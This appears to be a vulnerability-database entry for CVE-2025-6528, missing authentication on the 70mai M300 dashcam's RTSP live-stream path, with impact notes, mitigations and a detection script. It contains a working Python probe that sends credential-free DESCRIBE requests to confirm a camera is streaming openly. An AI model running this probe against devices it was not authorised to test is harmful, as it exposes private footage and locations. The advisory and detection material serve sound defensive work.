CVE-2025-6528: Improper Authentication in 70mai M300
A vulnerability has been found in 70mai M300 up to 20250611 and classified as problematic. It affects an unidentified part of the handler for /livestream/12 in the RTSP Live Video Stream Endpoint. Manipulation leads to improper authentication. The attack must be carried out from within the local network. The exploit has been publicly disclosed and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
AI Analysis
Technical Summary
CVE-2025-6528 is a medium-severity vulnerability in the 70mai M300 dashcam, firmware versions up to 20250611. The flaw is in the RTSP (Real Time Streaming Protocol) live video stream endpoint, specifically the stream path /livestream/12; the advisory does not identify the server-side code involved. The endpoint does not properly authenticate clients, so anyone who can reach the device over the local network can request and view the live video feed without credentials. No privileges or user interaction are needed and the attack complexity is low (CVSS vector AV:A/AC:L/PR:N/UI:N). The adjacent attack vector means the attacker must be on the same network segment as the dashcam, for instance joined to the Wi-Fi network the device uses; the issue is not reachable from the Internet unless that network has already been compromised or the RTSP service has been deliberately exposed. 70mai was notified early but has not responded or released a patch. A public exploit exists, but there are no reports of exploitation in the wild at this time. The impact is on confidentiality: the live stream reveals whatever the camera records. Integrity and availability of the device are not directly affected. The case is a typical example of an IoT device streaming sensitive data without robust authentication, which matters most in environments where local network access is not tightly controlled.
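The practical check for this class of flaw is an RTSP DESCRIBE request sent with no credentials: a server that answers 200 OK with an SDP body is handing the stream description to anyone, while a server that enforces authentication answers 401 with a WWW-Authenticate challenge. The script below is an added example, not code from the advisory, VulDB or 70mai. It assumes the device speaks RTSP on the standard TCP port 554 (the advisory names only the path, not a port), uses 192.168.0.1 as a placeholder device address, and ships two constructed sample responses so the parser and classifier can be exercised offline.

```python
"""Unauthenticated RTSP DESCRIBE probe for a stream path such as /livestream/12.

Added example, not code from the advisory, VulDB or 70mai. Assumptions:
  - the device answers RTSP on TCP port 554 (the advisory names only the path);
  - 192.168.0.1 is a placeholder for the dashcam's address on the local network;
  - SAMPLE_OK and SAMPLE_401 are constructed responses, not captured from a device.
"""
import socket
import sys

RTSP_PORT = 554                   # assumption: standard RTSP port
STREAM_PATH = "/livestream/12"    # path named in the advisory

# Constructed sample responses (not from a real 70mai M300).
SAMPLE_OK = (
    b"RTSP/1.0 200 OK\r\nCSeq: 1\r\nContent-Type: application/sdp\r\n"
    b"Content-Length: 12\r\n\r\nv=0\r\ns=cam\r\n"
)
SAMPLE_401 = (
    b"RTSP/1.0 401 Unauthorized\r\nCSeq: 1\r\n"
    b'WWW-Authenticate: Digest realm="cam", nonce="0123"\r\n\r\n'
)


def build_describe(host, path=STREAM_PATH, port=RTSP_PORT, cseq=1):
    """Build a DESCRIBE request that deliberately carries no Authorization header."""
    request = (
        f"DESCRIBE rtsp://{host}:{port}{path} RTSP/1.0\r\n"
        f"CSeq: {cseq}\r\n"
        "Accept: application/sdp\r\n"
        "User-Agent: rtsp-auth-check\r\n"
        "\r\n"
    )
    return request.encode("ascii")


def parse_response(raw):
    """Split an RTSP response into status code, lower-cased headers and body."""
    text = raw.decode("utf-8", errors="replace")
    head, _, body = text.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("RTSP/"):
        raise ValueError(f"not an RTSP response: {status_line!r}")
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"status": int(parts[1]), "headers": headers, "body": body}


def classify(resp):
    """200 with an SDP body = stream handed to an unauthenticated client; 401 = challenged."""
    status = resp["status"]
    if status == 200 and "application/sdp" in resp["headers"].get("content-type", ""):
        return "UNAUTHENTICATED_STREAM"
    if status == 401:
        return "AUTH_REQUIRED"
    if status == 404:
        return "PATH_NOT_FOUND"
    return f"OTHER_{status}"


def recv_response(sock):
    """Read the headers, then as many body bytes as Content-Length declares."""
    data = b""
    while b"\r\n\r\n" not in data:
        chunk = sock.recv(4096)
        if not chunk:
            return data
        data += chunk
    head, sep, body = data.partition(b"\r\n\r\n")
    length = 0
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            length = int(line.split(b":", 1)[1].strip())
    while len(body) < length:
        chunk = sock.recv(4096)
        if not chunk:
            break
        body += chunk
    return head + sep + body


def probe(host, port=RTSP_PORT, path=STREAM_PATH, timeout=5.0):
    """Send one unauthenticated DESCRIBE to a live device and return the verdict."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_describe(host, path, port))
        return classify(parse_response(recv_response(sock)))


def demo():
    """Offline run against the constructed samples; returns both verdicts."""
    return classify(parse_response(SAMPLE_OK)), classify(parse_response(SAMPLE_401))


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(sys.argv[1], probe(sys.argv[1]))   # e.g. python rtsp_check.py 192.168.0.1
    else:
        print("sample verdicts:", demo())
```

Run it with the dashcam's address as the only argument while joined to the same network; a verdict of UNAUTHENTICATED_STREAM reproduces the behaviour the advisory describes. Only DESCRIBE is sent, so the check does not start a stream or change device state; a device whose RTSP port differs from 554 needs the `port` argument adjusted.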
Potential Impact
For European organizations, the primary impact of CVE-2025-6528 is exposure of the visual data captured by 70mai M300 dashcams. Organizations using these devices for fleet management, logistics or security monitoring risk a confidentiality breach if an attacker on the same network views the live stream: operational details, employee movements and vehicle locations, and any people or vehicles in view of the camera. The realistic attackers are insiders, anyone who has joined the device's Wi-Fi network, or an intruder who has already compromised the corporate Wi-Fi. Integrity and availability are not affected, but the privacy and surveillance implications are significant, and because dashcam footage routinely contains personal data, exposure may create GDPR obligations. With no vendor response and no patch, the window of exposure is open-ended. The requirement for local network access limits the attack surface, so remote exploitation is unlikely, but the issue remains a concern wherever network segmentation or guest network controls are weak.
Mitigation Recommendations
- Segment the network: put the dashcams (and other IoT devices) on their own VLAN or SSID, isolated from corporate systems and data. If a device is reached through its own Wi-Fi hotspot, treat that hotspot as the local network in question: change any default passphrase and turn it off when not in use.
- Restrict who can join that network: strong Wi-Fi encryption (WPA3 where supported, otherwise WPA2 with a long passphrase) and network access control (NAC) so that only known devices connect.
- Monitor the segment for RTSP session setup (DESCRIBE, SETUP, PLAY) aimed at the device's RTSP port and the /livestream/12 path from any client other than the one expected to view the stream.
- Disable RTSP streaming on the device if the firmware exposes such an option and the feature is not needed; otherwise plan to replace the device with a model that enforces authentication on its stream endpoint.
- Do not expose the device or its network segment to the Internet; use a VPN for any remote access to the local network.
- Inventory IoT devices regularly so that vulnerable models are known and can be scheduled for mitigation or replacement.
- Watch for a vendor firmware release that fixes the issue; treat unofficial or community patches with caution, since their provenance cannot be verified and flashing them may void support.
- Apply network-level filtering so that RTSP traffic reaches the device only from the allowed client addresses.
- Educate staff about the risks of connecting unknown devices to corporate networks and enforce policies against unauthorized device use.
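The monitoring recommendation above can be turned into a concrete rule: alert whenever a DESCRIBE, SETUP or PLAY request for a /livestream/ path reaches a known dashcam from a client that is not on the allowlist of expected viewers. The code below is an added detection example, not part of the advisory or any vendor tooling. It assumes you can obtain RTSP request payloads together with source and destination addresses (from a span port, a pcap, or an IDS that extracts TCP payloads), that the dashcam addresses and the permitted clients are known, and it uses constructed sample records in place of real traffic.

```python
"""Flag RTSP stream requests to a dashcam from clients that should not be viewing it.

Added detection example, not from the advisory or any vendor tool. Assumptions:
  - RTSP request payloads with src/dst addresses are available (span port, pcap, IDS);
  - the dashcam addresses and the clients allowed to view streams are known;
  - SAMPLE_RECORDS are constructed, not captured from a real network.
"""
import ipaddress
from dataclasses import dataclass

STREAM_PREFIX = "/livestream/"                    # path family named in the advisory
WATCHED_METHODS = {"DESCRIBE", "SETUP", "PLAY"}   # requests that fetch or start a stream


@dataclass(frozen=True)
class RtspRecord:
    src: str
    dst: str
    payload: bytes


@dataclass(frozen=True)
class Alert:
    src: str
    dst: str
    method: str
    path: str
    authenticated: bool   # whether the request carried an Authorization header


def parse_request(payload):
    """Return (method, path, headers) for an RTSP request, or None if it is not one."""
    head = payload.decode("utf-8", errors="replace").split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("RTSP/"):
        return None
    method, url = parts[0], parts[1]
    path = url
    if "://" in url:                       # rtsp://host[:port]/path -> /path
        rest = url.split("://", 1)[1]
        path = "/" + rest.split("/", 1)[1] if "/" in rest else "/"
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def detect(records, dashcams, allowed_clients):
    """Alert on stream requests to a known dashcam from a client outside the allowlist."""
    cams = {ipaddress.ip_address(ip) for ip in dashcams}
    allowed = [ipaddress.ip_network(n) for n in allowed_clients]
    alerts = []
    for rec in records:
        if ipaddress.ip_address(rec.dst) not in cams:
            continue
        parsed = parse_request(rec.payload)
        if parsed is None:
            continue
        method, path, headers = parsed
        if method not in WATCHED_METHODS or not path.startswith(STREAM_PREFIX):
            continue
        src = ipaddress.ip_address(rec.src)
        if any(src in net for net in allowed):
            continue
        alerts.append(Alert(rec.src, rec.dst, method, path, "authorization" in headers))
    return alerts


# Constructed sample traffic: 192.168.0.1 is the dashcam, 192.168.0.10 the
# phone that is supposed to view it, 192.168.0.77 an unexpected client.
SAMPLE_RECORDS = [
    RtspRecord("192.168.0.10", "192.168.0.1",
               b"DESCRIBE rtsp://192.168.0.1/livestream/12 RTSP/1.0\r\nCSeq: 2\r\nAccept: application/sdp\r\n\r\n"),
    RtspRecord("192.168.0.77", "192.168.0.1",
               b"OPTIONS rtsp://192.168.0.1/ RTSP/1.0\r\nCSeq: 1\r\n\r\n"),
    RtspRecord("192.168.0.77", "192.168.0.1",
               b"DESCRIBE rtsp://192.168.0.1:554/livestream/12 RTSP/1.0\r\nCSeq: 2\r\nAccept: application/sdp\r\n\r\n"),
    RtspRecord("192.168.0.77", "192.168.0.50",
               b"DESCRIBE rtsp://192.168.0.50/livestream/12 RTSP/1.0\r\nCSeq: 2\r\n\r\n"),
    RtspRecord("192.168.0.77", "192.168.0.1",
               b"GET / HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n"),
]


def run_sample():
    """Run the detector over the constructed records; only the third one should alert."""
    return detect(SAMPLE_RECORDS, dashcams=["192.168.0.1"], allowed_clients=["192.168.0.10/32"])


if __name__ == "__main__":
    for a in run_sample():
        print(f"ALERT {a.src} -> {a.dst} {a.method} {a.path} authenticated={a.authenticated}")
```

Because the vulnerable device accepts unauthenticated requests, the presence or absence of an Authorization header is recorded for context rather than used as the trigger; the actionable signal is an unexpected client asking for the stream at all. OPTIONS and requests to hosts that are not dashcams are ignored to keep the rule quiet.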
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland
Technical Details
- Data Version: 5.1
- Assigner Short Name: VulDB
- Date Reserved: 2025-06-23T14:11:50.567Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 6859d7aadec26fc862d8a6ff
Added to database: 6/23/2025, 10:39:38 PM
Last enriched: 6/23/2025, 10:55:03 PM
Last updated: 6/23/2025, 10:55:03 PM
Related Threats
- CVE-2025-6534: Improper Control of Resource Identifiers in xxyopen novel-plus (Low)
- CVE-2025-6533: Authentication Bypass by Capture-replay in xxyopen novel-plus (Medium)
- CVE-2025-6532: Improper Access Controls in NOYAFA LF9 Pro (Medium)
- CVE-2025-6531: Improper Access Controls in SIFUSM BD S1 (Medium)
- CVE-2025-6530: Denial of Service in 70mai M300 (Medium)